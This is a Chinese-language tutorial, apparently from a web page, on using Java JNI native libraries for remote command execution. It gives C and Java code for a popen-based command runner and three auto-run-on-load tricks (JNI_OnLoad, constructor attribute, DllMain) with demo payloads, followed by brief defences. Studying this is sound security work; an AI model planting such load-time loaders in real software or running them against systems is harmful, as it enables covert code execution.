Java JNI 动态库加载与恶意代码执行技术详解<\/h1>

一、JNI 基础概念<\/h2>

JNI (Java Native Interface) 是 Java 本地接口，它由三部分组成：<\/p>

Java<\/strong>：Java 语言部分<\/li>
Native<\/strong>：代表本地环境（Windows\/Linux），通常指 C\/C++ 实现<\/li>

Interface<\/strong>：Java 与 Native 代码之间的通信接口<\/li> <\/ul>
JNI 允许 Java 代码调用非 Java 代码（主要是 C\/C++），实现 Java 与本地代码的交互。<\/p>
二、利用 JNI 加载动态链接库实现 RCE<\/h2>
基本步骤<\/h3>

编写 Java 文件定义 native 方法<\/li>
使用 javac 编译得到 .class 文件<\/li>
使用 javah 处理 .class 文件生成 C 头文件<\/li>
编写命令执行的 C 语言实现<\/li>
将 C 代码编译为动态链接库（.so\/.dll）<\/li>
Java 调用 System.loadLibrary 加载动态库<\/li> <\/ol>
详细实现<\/h3>
1. 编写 Java 文件<\/h4>
public<\/span> class<\/span> EvilClass<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> native<\/span> String execCmd<\/span>(<\/span>String cmd);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. 编译 Java 文件<\/h4> javac EvilClass.java <\/span><\/span><\/code><\/pre>3. 生成 C 头文件<\/h4> Java 10 之前：<\/p> javah -jni EvilClass <\/span><\/span><\/code><\/pre>Java 10 及之后：<\/p> javac -h . EvilClass.java <\/span><\/span><\/code><\/pre>生成的头文件 EvilClass.h<\/code> 内容：<\/p> \/* DO NOT EDIT THIS FILE - it is machine generated *\/<\/span> <\/span><\/span>#include<\/span> <jni.h><\/span> <\/span><\/span><\/span><\/span>\/* Header for class EvilClass *\/<\/span> <\/span><\/span> <\/span><\/span>#ifndef _Included_EvilClass <\/span><\/span><\/span>#define _Included_EvilClass <\/span><\/span><\/span>#ifdef __cplusplus <\/span><\/span><\/span><\/span>extern<\/span> "C"<\/span> { <\/span><\/span>#endif <\/span><\/span><\/span><\/span> <\/span><\/span>\/* <\/span><\/span><\/span> * Class: EvilClass <\/span><\/span><\/span> * Method: execCmd <\/span><\/span><\/span> * Signature: (Ljava\/lang\/String;)Ljava\/lang\/String; <\/span><\/span><\/span> *\/<\/span> <\/span><\/span>JNIEXPORT jstring JNICALL Java_EvilClass_execCmd <\/span><\/span> (JNIEnv *<\/span>, jclass, jstring); <\/span><\/span> <\/span><\/span>#ifdef __cplusplus <\/span><\/span><\/span><\/span>} <\/span><\/span>#endif <\/span><\/span><\/span>#endif <\/span><\/span><\/span><\/code><\/pre>4. 编写 C 实现<\/h4> EvilClass.c<\/code> 文件：<\/p> #include<\/span> <string.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <sys\/types.h><\/span> <\/span><\/span><\/span>#include<\/span> <unistd.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> "EvilClass.h"<\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>int<\/span> execmd<\/span>(const<\/span> char<\/span> *<\/span>cmd, char<\/span> *<\/span>result) { <\/span><\/span> char<\/span> buffer[1024<\/span>*<\/span>12<\/span>]; <\/span><\/span> FILE *<\/span>pipe =<\/span> popen(cmd, "r"<\/span>); \/\/ 打开管道执行命令 <\/span><\/span><\/span><\/span> if<\/span> (!<\/span>pipe) return<\/span> 0<\/span>; <\/span><\/span> <\/span><\/span> while<\/span>(!<\/span>feof(pipe)) { <\/span><\/span> if<\/span>(fgets(buffer, 128<\/span>, pipe)) { <\/span><\/span> strcat(result, buffer); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> pclose(pipe); <\/span><\/span> return<\/span> 1<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>JNIEXPORT jstring JNICALL Java_EvilClass_execCmd<\/span>(JNIEnv *<\/span>env, jclass class_object, jstring jstr) { <\/span><\/span> const<\/span> char<\/span> *<\/span>cstr =<\/span> (*<\/span>env)-><\/span>GetStringUTFChars(env, jstr, NULL); <\/span><\/span> char<\/span> result[1024<\/span>*<\/span>12<\/span>] =<\/span> ""<\/span>; <\/span><\/span> <\/span><\/span> if<\/span>(1<\/span> ==<\/span> execmd(cstr, result)) { <\/span><\/span> \/\/ 命令执行成功 <\/span><\/span><\/span><\/span> } <\/span><\/span> <\/span><\/span> char<\/span> return_messge[100<\/span>] =<\/span> ""<\/span>; <\/span><\/span> strcat(return_messge, result); <\/span><\/span> jstring cmdresult =<\/span> (*<\/span>env)-><\/span>NewStringUTF(env, return_messge); <\/span><\/span> return<\/span> cmdresult; <\/span><\/span>} <\/span><\/span><\/code><\/pre>5. 编译动态链接库<\/h4> Linux 下编译：<\/p> gcc -fPIC -I $JAVA_HOME\/include -I $JAVA_HOME\/include\/linux -shared -o libcmd.so EvilClass.c <\/span><\/span><\/code><\/pre>Windows 下编译：<\/p> gcc -fPIC -I "%JAVA_HOME%\include"<\/span> -I "%JAVA_HOME%\include\win32"<\/span> -shared -o libcmd.dll EvilClass.c <\/span><\/span><\/code><\/pre>6. Java 加载并调用<\/h4> public<\/span> class<\/span> Exp<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>System.<\/span>getProperty<\/span>(<\/span>"java.library.path"<\/span>));<\/span> <\/span><\/span> System.<\/span>loadLibrary<\/span>(<\/span>"libcmd"<\/span>);<\/span> <\/span><\/span> EvilClass example =<\/span> new<\/span> EvilClass();<\/span> <\/span><\/span> String res =<\/span> example.<\/span>execCmd<\/span>(<\/span>"whoami"<\/span>);<\/span> \/\/ 调用native方法 <\/span><\/span><\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>res);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>三、加载时直接执行恶意代码的三种方法<\/h2> 方法1：利用 JNI_OnLoad<\/h3> JNI_OnLoad<\/code> 是 JNI 提供的可选函数，在本地库被加载到 JVM 时自动调用。<\/p> C 代码实现：<\/p> #include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <jni.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>JNIEXPORT jint JNICALL JNI_OnLoad<\/span>(JavaVM *<\/span>vm, void<\/span> *<\/span>reserved) { <\/span><\/span> system("calc"<\/span>); \/\/ Windows 下弹出计算器 <\/span><\/span><\/span><\/span> \/\/ system("touch success"); \/\/ Linux 下创建文件 <\/span><\/span><\/span><\/span> return<\/span> JNI_VERSION_1_8; <\/span><\/span>} <\/span><\/span><\/code><\/pre>Java 加载代码：<\/p> public<\/span> class<\/span> Exp<\/span> {<\/span> <\/span><\/span> static<\/span> {<\/span> <\/span><\/span> System.<\/span>loadLibrary<\/span>(<\/span>"libcmd"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>方法2：利用 __attribute__((constructor))<\/code><\/h3> GCC\/Clang 提供的扩展语法，标记的函数会在动态库加载时自动执行。<\/p> C 代码实现：<\/p> #include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> __attribute__<\/span>((constructor)) myInitFunction() { <\/span><\/span> system("calc"<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>方法3：Windows 下利用 DllMain<\/h3> DllMain 是 Windows DLL 的入口点函数。<\/p> C 代码实现：<\/p> #include<\/span> <Windows.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>BOOL APIENTRY DllMain<\/span>(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { <\/span><\/span> switch<\/span> (ul_reason_for_call) { <\/span><\/span> case<\/span> DLL_PROCESS_ATTACH: \/\/ DLL加载时执行 <\/span><\/span><\/span><\/span> system("echo 'Rce Successfully!'"<\/span>); <\/span><\/span> break<\/span>; <\/span><\/span> case<\/span> DLL_PROCESS_DETACH: \/\/ DLL卸载时执行 <\/span><\/span><\/span><\/span> break<\/span>; <\/span><\/span> case<\/span> DLL_THREAD_ATTACH: \/\/ 线程连接时执行 <\/span><\/span><\/span><\/span> break<\/span>; <\/span><\/span> case<\/span> DLL_THREAD_DETACH: \/\/ 线程断开时执行 <\/span><\/span><\/span><\/span> break<\/span>; <\/span><\/span> } <\/span><\/span> return<\/span> TRUE; <\/span><\/span>} <\/span><\/span><\/code><\/pre>四、关键注意事项<\/h2> JDK 版本匹配<\/strong>：编译动态库时使用的 JDK 版本必须与目标机器一致<\/li> 库搜索路径<\/strong>： System.loadLibrary()<\/code> 从 java.library.path<\/code> 中搜索库<\/li> System.load()<\/code> 需要完整路径<\/li> <\/ul> <\/li> 平台差异<\/strong>： Linux 使用 .so<\/code> 文件<\/li> Windows 使用 .dll<\/code> 文件<\/li> <\/ul> <\/li> 安全风险<\/strong>：此类技术可被用于恶意目的，需谨慎使用<\/li> <\/ol> 五、防御措施<\/h2> 限制动态库加载权限<\/li> 验证动态库来源和完整性<\/li> 使用安全管理器限制敏感操作<\/li> 避免加载不可信的动态库<\/li> <\/ol> 通过以上技术细节，可以深入理解 JNI 动态库加载机制及其潜在的安全风险。<\/p>